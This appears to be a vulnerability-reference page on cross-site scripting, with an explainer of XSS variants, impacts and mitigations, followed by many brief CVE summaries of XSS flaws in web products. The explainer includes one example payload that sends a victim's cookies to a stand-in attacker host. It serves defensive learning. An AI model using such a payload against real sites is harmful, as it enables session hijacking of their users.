Cross-Site Scripting
Cross-Site Scripting occurs when an application accepts untrusted data and sends it to a web browser without proper validation or encoding.
How It Works
Cross-Site Scripting occurs when an application accepts untrusted data and sends it to a web browser without proper validation or encoding. The attacker crafts input containing JavaScript code, which the application then incorporates into its HTML response. When a victim's browser renders this response, it executes the injected script as if it were legitimate code from the trusted website.
The attack manifests in three main variants. Reflected XSS occurs when malicious script arrives via an HTTP parameter (like a search query) and immediately bounces back in the response—typically delivered through phishing links. Stored XSS is more dangerous: the payload persists in the application's database (in comment fields, user profiles, forum posts) and executes whenever anyone views the infected content. DOM-based XSS happens entirely client-side when JavaScript code improperly handles user-controllable data, modifying the DOM in unsafe ways without ever sending the payload to the server.
A typical attack flow starts with the attacker identifying an injection point—anywhere user input appears in HTML output. They craft a payload like <script>document.location='http://attacker.com/steal?c='+document.cookie</script> and inject it through the vulnerable parameter. When victims access the page, their browsers execute this script within the security context of the legitimate domain, giving the attacker full access to cookies, session tokens, and DOM content.
Impact
- Session hijacking: Steal authentication cookies to impersonate victims and access their accounts
- Credential harvesting: Inject fake login forms on trusted pages to capture usernames and passwords
- Account takeover: Perform state-changing actions (password changes, fund transfers) as the authenticated victim
- Keylogging: Monitor and exfiltrate everything users type on the compromised page
- Phishing and malware distribution: Redirect users to malicious sites or deliver drive-by downloads from a trusted domain
- Data exfiltration: Access and steal sensitive information visible in the DOM or retrieved via AJAX requests
Real-World Examples
A stored XSS vulnerability in Twitter (2010) allowed attackers to create self-propagating worms. Users hovering over malicious tweets automatically retweeted them and followed the attacker, creating viral spread through the platform's legitimate functionality.
eBay suffered from persistent XSS flaws in product listings (CVE-2015-2880) where attackers embedded malicious scripts in item descriptions. Buyers viewing these listings had their sessions compromised, enabling unauthorized purchases and account takeover.
British Airways faced a sophisticated supply chain attack (2018) where attackers injected JavaScript into the airline's payment page. The script skimmed credit card details from 380,000 transactions, demonstrating how XSS enables payment fraud at massive scale.
Mitigation
- Context-aware output encoding: HTML-encode for HTML context, JavaScript-encode for JS strings, URL-encode for URLs—never use generic escaping
- Content Security Policy (CSP): Deploy strict CSP headers to whitelist script sources and block inline JavaScript execution
- HTTPOnly and Secure cookie flags: Prevent JavaScript access to session cookies and ensure transmission over HTTPS only
- Input validation: Reject unexpected characters and patterns, though this is defense-in-depth, not primary protection
- DOM-based XSS prevention: Use safe APIs like
textContentinstead ofinnerHTML; avoid passing user data to dangerous sinks likeeval()
Recent CVEs (38830)
Stored cross-site scripting in SourceCodester Ship Ferry Ticket Reservation System 1.0 allows a remote attacker with high-privilege (admin-level) access to inject persistent malicious JavaScript into the Username field of the user management panel at /admin/?page=user/manage_user, which then executes in the browser of any other privileged user who visits that page. The vulnerability carries a CVSS base score of only 2.4 due to the combination of required high privileges, mandatory user interaction, and limited integrity-only impact with no confidentiality or availability consequence. No public exploit identified at time of analysis as a KEV-confirmed threat, but publicly available exploit code exists via a published Medium article and VulDB report.
Reflected XSS in NocoDB's password-reset flow allows an unauthenticated attacker to execute arbitrary JavaScript in the victim's browser within the NocoDB origin by sending a crafted password-reset link. The vulnerability stems from the EJS server-side template rendering the reset token directly into a JavaScript string literal without escaping single quotes or backslashes, enabling string-context escape. Any NocoDB instance running versions prior to 2026.04.1 is affected; no public exploit identified at time of analysis, though the advisory includes a functional proof-of-concept payload.
Cross-site scripting in tittuvarghese's PHP-based CollegeManagementSystem exposes users to script injection via the unvalidated `department_name` parameter in `/dashboard_page/forms/fetch.php`, exploitable remotely without authentication but requiring victim interaction. Publicly available exploit code (GitHub issue #6) lowers the technical barrier for opportunistic attacks, though CVSS scope remains unchanged with only low integrity impact. No patch has been released and the project maintainer has not responded to the coordinated disclosure, leaving all deployed instances permanently exposed under the rolling release model.
Reflected cross-site scripting in Lyrion Music Server 9.2.0 allows unauthenticated remote attackers to inject arbitrary JavaScript into victims' browsers via unsanitized advanced search parameters, enabling session token theft and account hijacking with a single user-click interaction. The changed scope (S:C) in the CVSS vector confirms the injected script executes outside the origin of the vulnerable application, amplifying cross-domain impact. No public exploit identified at time of analysis and no CISA KEV listing, but the ZeroScience Lab advisory reference is a known PoC-publishing outlet - PoC availability should be treated as likely pending confirmation.
Stored cross-site scripting in Lyrion Music Server 9.2.0 allows remote attackers to inject JavaScript payloads via media file metadata fields (GENRE, ARTIST, ALBUM) that execute when other users browse the web interface. With CVSS 7.2 and a changed scope, successful exploitation can reach management functions and disclose settings. No public exploit identified at time of analysis, and no CISA KEV listing.
Stored cross-site scripting in Lyrion Music Server 9.2.0's log viewer allows unauthenticated remote attackers to inject persistent JavaScript via unescaped template variables, executing arbitrary scripts in the browsers of administrators or other users who view the logs. Injection vectors include the search, lines, and path query parameters as well as indirect channels such as URLs, User-Agent headers, stream titles, and player names that get written to the server log. No public exploit identified at time of analysis, but the CVSS 7.2 score reflects a scope-changed impact (S:C) due to the cross-origin nature of XSS.
Reflected cross-site scripting in Lyrion Music Server 9.2.0 allows a remote unauthenticated attacker to inject and execute arbitrary JavaScript in a victim's browser by tricking them into visiting a crafted URL targeting the server.log endpoint's search parameter. The vulnerability carries a changed scope (S:C in CVSS), meaning malicious script executes in the context of the affected application's origin, enabling session theft, credential harvesting, or UI redressing against users of the media server interface. No public exploit is confirmed at time of analysis, and no KEV listing exists, but the advisory was published to zeroscience.mk - a research outlet that routinely accompanies disclosures with proof-of-concept code.
Reflected cross-site scripting in HCL Digital Experience Compose's search center allows unauthenticated remote attackers to inject and execute arbitrary JavaScript in a victim's browser session. The CVSS Scope:Changed rating reflects that the injected script executes outside the originating application's security domain, enabling session hijacking, credential harvesting, or malicious UI redirection against authenticated portal users. No public exploit code and no active exploitation have been identified at time of analysis, though the low attack complexity and absence of privilege requirements make it trivially deliverable via phishing.
Reflected cross-site scripting in Znuny's AdminCommunicationLog (communication log administration view) allows a low-privileged authenticated attacker to inject arbitrary JavaScript that executes in the context of other users' browsers, with changed scope indicating impact beyond the vulnerable component itself. Affected releases are Znuny LTS before 6.5.21 and Znuny before 7.3.3. No public exploit identified at time of analysis and this CVE does not appear in CISA KEV, though the low-complexity, network-accessible attack vector and changed scope elevate practical concern for deployments with untrusted low-privilege users.
Stored cross-site scripting in Znuny's user preferences mechanism allows an authenticated low-privileged attacker to inject persistent malicious scripts that execute in other users' browsers, crossing security boundaries (S:C) to potentially compromise administrator sessions or perform unauthorized actions on their behalf. Both the LTS branch (before 6.5.21) and the main release branch (before 7.3.3) are affected. Vendor-released patches exist for both branches; no public exploit identified at time of analysis and the vulnerability is not listed in the CISA KEV catalog.
OpenAI Atlas before 1.2025.288.15 improperly exposed privileged browser APIs - including browser history access and tab open/close controls - to any web content loaded from *.openai.com origins, including the publicly accessible forum.openai.com. Because forum.openai.com harbored an independent cross-site scripting vulnerability, an attacker could chain the two weaknesses: inject a script via the forum XSS, which then silently invokes Atlas's privileged APIs against a visiting victim. No public exploit or CISA KEV listing has been confirmed at time of analysis, though a public security research blog (hacktron.ai) describes the attack surface; the EPSS score of 0.02% (4th percentile) reflects low observed exploitation probability.
Multiple reflected Cross-Site Scripting vulnerabilities in damasac's thaipalliative_lte PHP application (through version 3.0) allow unauthenticated remote attackers to inject arbitrary JavaScript into victim browsers by crafting malicious URLs. The vulnerable file /substudy/ezform.php unsafely echoes four distinct user-controlled parameters - idFormMain, id (in two locations), and ptid_key - directly into HTML attributes and JavaScript contexts without output encoding. A proof-of-concept exists per SSVC data; however, EPSS is very low at 0.08% (23rd percentile) and exploitation is not confirmed by CISA KEV, suggesting limited widespread attacker interest at time of analysis.
Universal Cross-Site Scripting (UXSS) in Google Chrome's CSS implementation prior to version 149.0.7827.53 allows remote unauthenticated attackers to inject arbitrary scripts or HTML across origin boundaries via a crafted HTML page, requiring only user interaction. The Scope:Changed CVSS component (S:C) confirms this bypasses Chrome's Same-Origin Policy, enabling access to content from other origins in the victim's browser session. No public exploit code has been identified at time of analysis, and this is not listed in CISA KEV; however, UXSS classes in major browsers are historically targeted by threat actors for session hijacking and credential theft.
Universal Cross-Site Scripting (UXSS) in Google Chrome's SVG implementation prior to version 149.0.7827.53 allows remote unauthenticated attackers to bypass same-origin policy by injecting arbitrary scripts or HTML across origins via a crafted HTML page. Exploitation requires user interaction and high attack complexity (CVSS AC:H/UI:R), and EPSS at 0.06% (18th percentile) reflects limited real-world exploitation activity. No active exploitation is confirmed by CISA KEV and no public exploit code has been identified at time of analysis.
Universal Cross-Site Scripting (UXSS) in Google Chrome's XML processing component allows remote unauthenticated attackers to inject arbitrary scripts or HTML across origin boundaries by luring a victim to a crafted HTML page. All Chrome versions prior to 149.0.7827.53 are affected, with the Scope:Changed (S:C) CVSS vector confirming this vulnerability can bypass the Same-Origin Policy - the defining characteristic of UXSS. No public exploit code has been identified at time of analysis, and the EPSS score of 0.06% (18th percentile) reflects low observed exploitation probability, though UXSS primitives are historically attractive to threat actors targeting session data and credential theft at scale.
Stored cross-site scripting in Chartbrew 4.9.0 through 5.0.0 lets a project-editor inject HTML/JavaScript into the ChartDatasetConfig.legend field, which is later rendered into the chart tooltip DOM via an unguarded innerHTML sink in ChartTooltip.js. Every unauthenticated viewer of a public dashboard executes the attacker payload on page load with no hover interaction required, and no public exploit is identified at time of analysis beyond the proof-of-concept payloads documented in the GitHub Security Advisory. Version 5.0.1 contains the fix.
Stored cross-site scripting in Shopware's media manager allows any authenticated admin to upload an unsanitized SVG file containing arbitrary JavaScript that executes in the Shopware domain context when the file is accessed by any user. The upload pipeline - spanning MediaUploadController, FileSaver, and TypeDetector - classifies SVG as a valid ImageType with VECTOR_GRAPHIC flag but performs zero content sanitization: no DOMPurify, no enshrined/svg-sanitize, no strip_tags on SVG XML content. In an e-commerce context this enables admin account takeover, customer data exfiltration, and malicious plugin installation. No public exploit identified at time of analysis and this vulnerability is not listed in CISA KEV.
Stored XSS in AVideo's YouTubeAPI plugin allows any YouTube video uploader whose video matches the AVideo operator's configured search keyword to inject arbitrary JavaScript into every visitor's browser via the homepage gallery section. The `snippet.title` field returned by the YouTube Data API is rendered verbatim across four HTML output sites in `plugin/YouTubeAPI/gallerySection.php`, three of which apply no encoding whatsoever; the fourth applies only a partial `str_replace` that strips double-quotes and leaves the other three sinks untouched. Publicly available exploit code is documented in GHSA-66q5-cj5g-wrfx; the payload persists for up to 3600 seconds (the default cache TTL) after the hostile video is removed from YouTube, and when the victim is an authenticated AVideo administrator the injected script can escalate to full administrative takeover via cookie-based requests lacking CSRF protection.
Reflected XSS in WWBN AVideo's YouTubeAPI plugin allows any unauthenticated remote attacker to execute arbitrary JavaScript in a victim's browser by inducing the victim to open a single crafted URL. The unsanitized `$_GET['search']` parameter is interpolated raw into pagination link href attributes in `plugin/YouTubeAPI/gallerySection.php`, and the AVideo Layout plugin then automatically hoists the injected script tag into a clean executable inline script block at page bottom - bypassing naive attribute-context filters. A detailed proof-of-concept is publicly documented in GitHub Security Advisory GHSA-hgjh-6wj8-gcgf; no active exploitation confirmed in CISA KEV at time of analysis.
Stored cross-site scripting in WWBN AVideo (all versions through 29.0) lets an authenticated user execute arbitrary JavaScript in other connected users' browsers via the SQLite-backed YPTSocket WebSocket messaging system. The flaw is an incomplete-fix bypass of CVE-2026-43874: the prior patch only stripped the `autoEvalCodeOnHTML` key from `$json['msg']`, but `msgToResourceId()` prioritizes the sibling `json` key, so a payload placed there reaches the victim unsanitized. Publicly available exploit code exists in the GitHub advisory PoC; EPSS is low (0.13%) and it is not on CISA KEV, so no active exploitation is indicated.
Stored cross-site scripting in Tautulli before 2.17.1 allows low-privilege authenticated users (including guests when guest access is enabled) to inject HTML/JavaScript into the main application log via the log_js_errors endpoint, which later executes in an administrator's browser when the admin opens the logFile viewer. The flaw enables privilege escalation against the Plex Media Server monitoring tool's admin account. No public exploit identified at time of analysis, but the vendor-published advisory and confirmed patch in 2.17.1 make the issue well-documented.
WordPress Popup Builder 3.49 contains a persistent cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by breaking out of option tags in the post_title. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.
WordPress Soliloquy Lite 2.5.6 contains a persistent cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by inserting script tags in the post title. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.
WordPress Theme Zoner Real Estate 4.1.1 contains a persistent cross-site scripting vulnerability that allows authenticated agents to inject malicious scripts through the Address input field when. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.
GigToDo 1.3 contains a persistent cross-site scripting vulnerability that allows authenticated attackers to inject malicious JavaScript and HTML code through the proposal description field. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.
Live Chat Unlimited 2.8.3 contains a stored cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts through the chat input field. Rated medium severity (CVSS 5.3), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.
Zuz Music 2.1 contains a persistent cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious JavaScript by submitting crafted contact form data. Rated medium severity (CVSS 5.3), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.
Reflected cross-site scripting in itsourcecode Fees Management System 1.0 allows remote unauthenticated attackers to inject arbitrary JavaScript into a victim's browser session by manipulating the 'page' parameter in /navbar.php. The attack requires user interaction - a victim must follow a crafted URL - limiting mass exploitation, but publicly available exploit code (referenced via a GitHub issue) lowers the barrier for targeted phishing campaigns. No CISA KEV listing; EPSS data was not provided, though the combination of no authentication requirement and public POC warrants prompt attention for exposed deployments.
CSV injection and reflected cross-site scripting affect HCL iControl due to insufficient input sanitization in the Export CSV feature and reflected parameters. An attacker who can lure an authenticated user to click a crafted link can execute script in the victim's browser session or inject formula payloads into exported CSV files that execute when opened in spreadsheet applications. No public exploit identified at time of analysis; the issue carries a CVSS 7.1 (High) rating driven largely by user-interaction and low-privilege requirements.
Missing HTTP security response headers in HCL iControl fail to instruct client browsers to engage their built-in XSS filtering mechanisms, creating an exploitable gap classified under CWE-693 (Protection Mechanism Failure). The flaw is network-accessible and requires no authentication (PR:N per CVSS), but carries a CVSS 3.7 Low score due to high attack complexity (AC:H) and limited integrity-only impact (I:L). No public exploit code exists and this vulnerability is not listed in CISA KEV, placing it in the compliance/hardening category rather than immediate critical risk.
Stored cross-site scripting in the SMS module of Neterbit NW-431F Router firmware 20241014-IR03 and earlier allows remote attackers to inject JavaScript payloads via inbound SMS messages, which execute in the administrator's browser when the SMS interface is viewed. No public exploit identified at time of analysis, though a researcher repository on GitHub documents the issue. The cellular-router form factor makes the SMS vector particularly notable because injection can originate from the mobile network rather than the local LAN.
Stored cross-site scripting in Arket Globe Document Intelligence 5.0.0.559 enables authenticated low-privilege attackers to inject persistent JavaScript payloads into document text fields, which execute in the browsers of other users viewing the 'Task in Progress / Recent' page. The CVSS High confidentiality impact (C:H) reflects the realistic risk of session token theft or account takeover against higher-privileged users such as administrators. Publicly available exploit code exists on GitHub (vincenzo-emanuele/CVE-2025-65640), and while no CISA KEV listing is present, the SSVC framework confirms exploitation-class proof-of-concept activity.
Stored XSS in the malla Meshtastic dashboard (pip/malla <= 0.1.7) allows any unauthenticated participant on a public MQTT broker to execute arbitrary JavaScript in the browser of every dashboard visitor. Meshtastic node names (long_name, short_name) received via MQTT are stored in SQLite without sanitization and interpolated directly into multiple HTML templates and frontend JavaScript files without output escaping. No CSP restrictions are in place, compounding impact. No public exploit identified at time of analysis, though full reproduction steps are published in GHSA-ch57-39q2-4crm.
Stored or reflected Cross-Site Scripting in MaxSite CMS v.109.2 allows a remote attacker with low-privilege authenticated access to inject malicious scripts via the Backend page file upload endpoint (admin_page), which execute in the browsers of other users - including administrators - to exfiltrate sensitive information such as session tokens. The CVSS vector (S:C) confirms the attack crosses a security scope boundary, amplifying impact beyond the attacker's own session. A researcher-published proof-of-concept is publicly available on GitHub, though EPSS remains very low at 0.05% (17th percentile) and no active exploitation has been confirmed by CISA KEV.
Stored cross-site scripting in ERPNext 16.16.0 allows an authenticated user holding Item record edit permissions to persist malicious HTML/JavaScript in the item_name, description, or image fields, which executes unescaped in the Point of Sale (POS) cart interface for any operator who subsequently adds that item to a transaction. Reported by Fluid Attacks (EUVD-2026-34158), this is a stored XSS with lateral impact across all POS operator sessions exposed to the poisoned item record. No public exploit code has been identified at time of analysis and this vulnerability is not listed in the CISA KEV catalog; the CVSS 4.0 score of 4.8 reflects the constrained attack surface imposed by high privilege prerequisites and required passive user interaction.
Stored cross-site scripting in ERPNext 16.16.0 allows authenticated users to inject arbitrary HTML and JavaScript into the email_id or mobile_no fields of Customer records, which execute silently in the browser of every Point of Sale (POS) operator who subsequently selects the poisoned customer. Because the payload persists in the database, a single injection event affects all future POS operator sessions that encounter that customer - creating a multiplier effect without requiring repeated attacker access. No public exploit code or CISA KEV listing exists at time of analysis; EPSS data was not provided in available intelligence sources.
Cross-site scripting in Cisco Webex Meetings' web-based UI allowed unauthenticated remote attackers to execute arbitrary JavaScript in a victim's browser by persuading them to follow a crafted malicious link. Insufficient input validation (CWE-79) in the Webex Meetings web interface is the root cause; the Changed Scope (S:C) in the CVSS vector indicates impact extends beyond the Webex application into the broader browser context, enabling session theft or browser-based data access. Cisco has fully remediated this server-side in the Webex cloud service, and no customer action is required. No public exploit code identified at time of analysis, and this CVE is not listed in the CISA KEV catalog.
Stored cross-site scripting in GLPI 10.0.4 through 10.0.24 allows an authenticated technician to persist a malicious JavaScript payload in the asset locked tab, which executes in the browser of any subsequent user who views the affected asset. The flaw carries a CVSS 4.0 score of 8.4 driven by high impact on confidentiality, integrity, and availability of the victim session, though exploitation requires high privileges (technician role) and user interaction. No public exploit identified at time of analysis and SSVC reports no observed exploitation.
backpack/crud provides Create, Read, Update & Delete (CRUD) functions for Backpack, a collection of Laravel packages that help users build custom administration panels. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available.
Stored XSS in ProjectsAndPrograms school-management-system allows an authorized attacker to inject malicious JavaScript into multiple student and teacher object attributes, which then executes in the browsers of other authenticated users. Critically, when chained with CVE-2025-11661 - which grants unauthenticated access to backend endpoints - the attack escalates to fully remote, unauthenticated exploitation, removing the otherwise required low-privilege foothold. No patch has been released and no public exploit code has been identified at time of analysis, though the application is confirmed vulnerable at commit 6b6fae5 per CERT.PL.
HTML injection in Thinkst Applied Research Canarytokens notification emails for 'Slow Redirect' and 'Cloned Website' token types allows an attacker who triggers those tokens to embed arbitrary HTML and JavaScript into the alert email sent to the operator. If the recipient opens the notification in an HTML-rendering email client, the injected content executes within that client's context, enabling interface manipulation and XSS. This affects self-hosted Docker deployments between tag sha-c42435e and sha-bfda4df; a proof of concept exists (CVSS E:P), though no public exploit confirmed active exploitation and CISA KEV listing is absent.
Stored/reflected cross-site scripting in ABB T-MAC Plus version 4.0-24 allows authenticated low-privileged attackers to inject malicious script content into the web management interface, which executes in the browsers of other users who interact with the affected pages. With a CVSS 4.0 base score of 7.2 and no public exploit identified at time of analysis, the flaw is notable because successful exploitation impacts both the vulnerable component and downstream subsequent systems with high integrity and availability consequences, reflecting the operational-technology context typical of ABB industrial products.
Reflected cross-site scripting in Fox-themes Prague (WordPress theme/plugin family) through version 2.2.8 lets a remote attacker inject script that executes in a victim's browser when the victim clicks an attacker-crafted link. The flaw was disclosed via Patchstack and carries a CVSS 7.1 (scope-changed) rating; no public exploit identified at time of analysis and the issue is not on CISA KEV.
Stored Cross-Site Scripting in the Passeum Ticketing WordPress plugin (all versions ≤ 1.0) allows authenticated administrators on multisite installations to load attacker-controlled JavaScript and CSS on every frontend page that renders a plugin shortcode. The attack path runs through the plugin's `shop_name` setting: the `validate_shop_name()` function accepts any non-empty string, and `get_shop_url()` passes URLs beginning with 'http' directly to `wp_register_script()` and `wp_register_style()` without sanitization, causing the site to enqueue external resources from an attacker-controlled domain for all site visitors. No public exploit identified at time of analysis, and the vulnerability is explicitly scoped to WordPress multisite environments - single-site administrators are unaffected because they already hold the `unfiltered_html` capability.
Stored cross-site scripting in RockRMS versions 16.13 and earlier through 17.7.0 allows authenticated attackers to inject malicious JavaScript via the Social Media links field in user profiles, leading to privilege escalation when administrators view the profile. According to the Raxis disclosure referenced in this CVE, the flaw enables session hijacking and account takeover of higher-privileged users. There is no public exploit identified at time of analysis, but a detailed technical write-up is publicly available describing the attack path.
Cross-site scripting in Kimi AI v1.0's web interface 'Preview' feature allows unauthenticated remote attackers to execute arbitrary JavaScript in a victim's browser by inducing them to view AI-generated content containing unsanitized HTML or JavaScript payloads. The root cause is the application's failure to sanitize or encode output from the AI model before rendering it into the DOM when a user activates the Preview tab. A publicly available proof-of-concept exploit exists at a GitHub repository linked to the CVE; no confirmed active exploitation (CISA KEV) has been identified at time of analysis.
Stored Cross-Site Scripting in Dovestones Softwares ADPhonebook before v4.0.1.1 permits authenticated admin users to inject persistent JavaScript payloads via the /Admin/Save API endpoint. Because multiple configuration sections lack input validation and output encoding, injected scripts survive across sessions and execute in any victim's browser when the affected configuration pages are loaded, with CVSS scope change (S:C) confirming cross-user impact beyond the planting admin. No public exploitation identified at time of analysis; EPSS is 0.02% (5th percentile), though a publicly available proof-of-concept gist exists at the referenced GitHub URL.
Stored Cross-Site Scripting in Koha 25.11 and earlier allows a remote authenticated attacker to inject and execute arbitrary JavaScript in victim browsers via the file upload function within the Invoice features module. The CVSS Scope:Changed designation indicates the injected script executes in a security context beyond the attacker's own session - targeting higher-privileged users (e.g., acquisitions staff or administrators) who subsequently view the affected invoice. A researcher blog post at g03m0n.github.io documents this vulnerability, suggesting public technical details are available. No public exploit identified at time of analysis, and EPSS at 0.05% (16th percentile) indicates low observed exploitation probability.
Stored cross-site scripting in GLPI versions 11.0.0 through 11.0.6 allows an authenticated technician to persist a malicious payload inside ITIL cost records, which then executes in the browser of any user who later views the affected ticket or change. The flaw is fixed in 11.0.7 and there is no public exploit identified at time of analysis, but the high CVSS 4.0 score (7.1) reflects the broad confidentiality/integrity/availability impact on the victim's session once triggered.
Stored cross-site scripting in OpenCTI's email-message observable rendering allows an unauthenticated attacker to inject malicious script payloads via STIX data sharing or platform ingesters, which then execute in the browsers of authenticated users who view the affected observable. Versions prior to 7.260227.0 are affected; the body field of email-message observables is passed to the renderer without sanitization. Successful exploitation can chain into CSRF attacks and large-scale session token theft across the user base. No public exploit or CISA KEV listing exists at time of analysis; vendor-released patch is available.
Cross-site scripting in authentik identity provider versions prior to 2025.12.5 and 2026.2.3 allows remote attackers to execute arbitrary JavaScript in a victim's browser by abusing the AutosubmitStage within the Simple Flow Executor (SFE). With a CVSS of 9.3 reflecting scope change and high impact to confidentiality/integrity, exploitation enables session hijacking against an identity provider, but no public exploit identified at time of analysis.
Stored cross-site scripting in GLPI before 11.0.7 allows an attacker with write access to the knowledge base to embed a persistent XSS payload that executes in the browsers of users who later view the affected knowledge base item. The flaw was reported by Fluid Attacks and is rated High severity (CVSS 8.4) by the vendor, who shipped a fix in the 11.0.7 security release; no public exploit identified at time of analysis and the issue is not on the CISA KEV list.
Client-side Cross-Site Scripting in React Router 7.7.0 through 7.13.1 affects applications using the unstable React Server Components (RSC) APIs, where redirect handling fails to sanitize destinations originating from untrusted sources. An attacker who can influence redirect targets consumed by RSC handlers may inject script payloads that execute in the victim's browser, with no public exploit identified at time of analysis. The advisory is published as GHSA-rxv8-25v2-qmq8 and the issue is fixed in 7.13.2.
Client-side cross-site scripting in React Router 7.7.0 through 7.13.1 allows remote attackers to execute arbitrary script in a victim's browser when the application uses the unstable React Server Components (RSC) APIs and processes redirects originating from untrusted sources. The flaw is patched in 7.13.2; no public exploit identified at time of analysis and the vulnerability does not affect deployments that do not opt into the RSC APIs.
Cross-site scripting in React Router's Framework Mode (versions 7.5.1-7.13.1) allows an authenticated attacker with influence over redirect destinations to inject malicious content into statically pre-rendered HTML files via an unsanitized HTTP Location header. Exploitation requires both low-privilege authentication (confirmed by CVSS PR:L) and victim user interaction (UI:R), limiting mass exploitation. No public exploit has been identified at time of analysis, and CISA KEV status is not confirmed. A vendor-released patch exists in version 7.13.2.
Reflected XSS in NamelessMC 2.2.4 allows unauthenticated remote attackers to inject and execute arbitrary JavaScript in a victim's browser via the unsanitized `id` parameter at the `/index.php?route=/queries/user/` endpoint. Exploitation requires victim interaction (UI:R per CVSS), making this a social-engineering-dependent attack suited to targeted phishing against Minecraft server administrators or users. No public exploit code has been identified and the vulnerability is not listed in CISA KEV; version 2.2.5 fully resolves the issue.
Stored XSS in the Progress Planner WordPress plugin (versions through 1.9.0) enables a high-privileged attacker to inject persistent malicious scripts into web pages served to other users. Because the scope is marked Changed (S:C), the injected payload executes in the context of lower-privileged site visitors, not just the attacker's session, crossing the admin-to-user security boundary. No public exploit code or active exploitation has been identified at time of analysis.
Stored XSS in Appsmith's SQL query editor autocomplete allows an authenticated Developer-role user to inject persistent malicious JavaScript via crafted database table or column names that are rendered unsanitized through innerHTML. When other workspace members interact with the same datasource's query editor, the injected script executes in their browser session, enabling session token theft and unauthorized actions with high confidentiality impact (CVSS C:H). A public proof-of-concept exploit exists (Stuub/Appsmith-1.98-Stored-XSS-Exploit on GitHub), and the vulnerability was reported by CERT/CC, materially elevating practical exploitation risk above what the CVSS 6.3 Medium score alone implies.
Reflected cross-site scripting in the WP Job Portal WordPress plugin (versions up to and including 2.5.1) allows remote attackers to inject arbitrary JavaScript that executes in a victim's browser after they click a crafted link. The flaw has CVSS 7.1 elevated by scope change (S:C), meaning script execution can impact resources beyond the vulnerable component, such as the WordPress admin session. No public exploit identified at time of analysis and no CISA KEV listing.
Reflected cross-site scripting in the UnboundStudio Accordion FAQ WordPress plugin (versions through 2.2.1) allows remote attackers to execute arbitrary JavaScript in a victim's browser session by luring them to click a crafted link. The CVSS 7.1 score reflects scope change (S:C), meaning script execution can affect resources beyond the vulnerable component, such as the WordPress admin context. No public exploit identified at time of analysis, and the issue is not listed in CISA KEV.
Reflected XSS in Wirtualna Uczelnia (Simple SA) allows unauthenticated remote attackers to execute arbitrary JavaScript in victims' browsers by embedding payloads in the locale parameter across multiple application endpoints. All versions up to wu#2016.437.295#0#20260327_105545 are affected; the flaw was disclosed by CERT-PL and catalogued under ENISA EUVD-2026-33903. No public exploit or CISA KEV listing is confirmed at time of analysis, but the zero-privilege, low-complexity attack vector makes social-engineering-driven exploitation straightforward for any attacker who can induce a victim to click a crafted URL.
Stored cross-site scripting in the Tiled Gallery Carousel Without JetPack WordPress plugin (versions up to and including 3.1) allows authenticated attackers with contributor-level access to inject persistent malicious JavaScript via the 'data-image-title' parameter. The injected script executes in victims' browsers each time an affected gallery page is visited, enabling session theft, credential harvesting, or malicious redirects against site visitors and administrators. No public exploit or CISA KEV listing has been identified at time of analysis, though the low privilege barrier (contributor access) broadens the potential attacker pool on sites with open registration.
Reflected Cross-Site Scripting in the rognone plugin for WordPress (versions up to and including 0.6.2) allows unauthenticated remote attackers to inject and execute arbitrary JavaScript in a victim's browser by tricking them into clicking a specially crafted link containing a malicious 'a' parameter. The vulnerability originates in header.php at line 74, where user-supplied input is reflected into page output without sanitization or escaping. No public exploit code or CISA KEV listing has been identified at time of analysis, and EPSS data was not provided in source intelligence.
Stored Cross-Site Scripting in the Word Replacer WordPress plugin (versions up to and including 0.4) allows authenticated attackers with Administrator-level access to persist arbitrary JavaScript payloads via the 'replacement' parameter, which subsequently execute in the browsers of any user visiting an affected page. Reported by Wordfence, the root cause is insufficient input sanitization and output escaping in word-replacer.php at multiple code locations (lines 191, 230, 339, 343). No public exploit code has been identified at time of analysis, and the vulnerability is not listed in the CISA KEV catalog.
Stored Cross-Site Scripting in the DeMomentSomTres Shortcodes WordPress plugin (all versions through 1.1.1) allows authenticated attackers with contributor-level access to persistently inject arbitrary JavaScript into page content via the 'callout' shortcode's 'width' and 'align' attributes. The injected payload executes in the browsers of any subsequent visitor to the affected page, enabling session hijacking, credential theft, or malicious redirects scoped to the WordPress front-end. No public exploit has been identified at time of analysis, and the CVSS Scope:Changed rating reflects that the impact extends beyond the attacker's own session to affect other users.
Stored Cross-Site Scripting in the Easy Cart WordPress plugin (all versions up to and including 1.8) permits authenticated Contributor-level users to inject persistent JavaScript payloads via the 'add_to_cart' shortcode. The vulnerability originates in the ectp_add_to_cart() function at plugin.php lines 280-287, where shortcode attributes such as 'product_name', 'product_desc', 'itemid', 'product_qty', and 'price' are processed with sanitize_text_field()-a function that strips HTML tags but does not escape double-quote characters-before being embedded in double-quoted HTML attributes. This allows attribute context breakout and arbitrary event handler injection that executes against any visitor loading the affected page. No public exploit code or CISA KEV listing has been identified at time of analysis.
Reflected Cross-Site Scripting in the hiWeb Migration Simple WordPress plugin (all versions up to and including 2.0.0.1) allows unauthenticated remote attackers to inject arbitrary JavaScript via the unsanitized 'new_domain' parameter rendered in template/force-re-migrate-confirm.php. Exploitation requires tricking a logged-in WordPress administrator into clicking a crafted URL, at which point the injected script executes in the administrator's browser session under the site's origin - a Changed scope per CVSS - enabling potential account takeover or unauthorized admin-level actions. No public exploit code or CISA KEV listing has been identified at time of analysis; EPSS data was not provided in source intelligence.
Stored Cross-Site Scripting in the WP Nano AD WordPress plugin (all versions through 1.31) allows authenticated administrators to inject persistent malicious scripts via the 'blogrole_link' parameter in add_links.php, with execution occurring in any victim's browser upon visiting the compromised page. Exploitation is restricted to WordPress multi-site networks or single-site installations where the unfiltered_html capability has been explicitly disabled - notably a configuration common in security-hardened deployments. No public exploit identified at time of analysis, though a public security writeup by BFS-Lab has been published on GitHub, increasing the likelihood of weaponized attempts against qualifying environments.
